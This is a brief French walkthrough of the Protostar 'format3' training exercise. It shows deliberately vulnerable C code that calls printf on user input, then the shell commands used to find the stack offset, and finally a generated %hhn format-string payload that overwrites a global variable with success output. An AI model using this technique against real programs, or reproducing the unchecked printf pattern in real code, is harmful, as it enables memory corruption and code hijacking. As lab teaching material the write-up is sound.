#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int target; void printbuffer(char *string) { printf(string); } void vuln() { char buffer[512]; fgets(buffer, sizeof(buffer), stdin); printbuffer(buffer); if(target == 0x01025544) { printf("you have modified the target :)\n"); } else { printf("target is %08x :(\n", target); } } int main(int argc, char **argv) { vuln(); }
Même niveau que le précédent, sauf que cette fois ci nous devons inscrire 0x01025544
dans target
.
user@protostar:/opt/protostar/bin$ nm ./format3 | grep target 080496f4 B target user@protostar:/opt/protostar/bin$ for i in {1..200}; do if echo BBBB%$i\$x | ./format3 | grep 4242; then echo $i; fi; done BBBB42424242 12 user@protostar:/opt/protostar/bin$ python -c 'print "BBBB%12$x"' | ./format3 BBBB42424242 target is 00000000 :(
Comme je suis un gros flemmard, j'ai codé un outil qui permet de créer des payload pour format string en une ligne de commande. Vous pouvez le télécharger ici.
tlk-laptop:FormatString tlk$ ./FormatString.py usage: FormatString.py [-h] [--aprint APRINT] [--nformater NFORMATER] format_number addr_to_o addr_to_w FormatString.py: error: too few arguments tlk-laptop:FormatString tlk$ ./FormatString.py 12 080496f4 01025544 Your payload : \xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08\xf7\x96\x04\x08%52c%12$hhn%17c%13$hhn%173c%14$hhn%255c%15$hhn
Parfait, on a plus qu'à tester
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08\xf7\x96\x04\x08%52c%12$hhn%17c%13$hhn%173c%14$hhn%255c%15$hhn"' | ./format3 ???? ? you have modified the target :)